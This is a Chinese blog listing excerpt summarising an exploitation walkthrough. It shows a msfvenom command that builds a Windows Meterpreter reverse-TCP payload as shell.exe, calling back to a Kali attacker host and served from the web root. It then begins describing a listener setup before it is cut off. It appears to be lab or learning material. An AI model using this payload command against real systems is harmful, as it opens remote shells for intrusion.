摘要: 1. 漏洞利用过程 msfconsole生成反弹shell: msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe 在其中一个dos框中进行监听: use 阅读全文
posted @ 2021-08-14 16:58 EndlessShw 阅读(78) 评论(0) 推荐(0)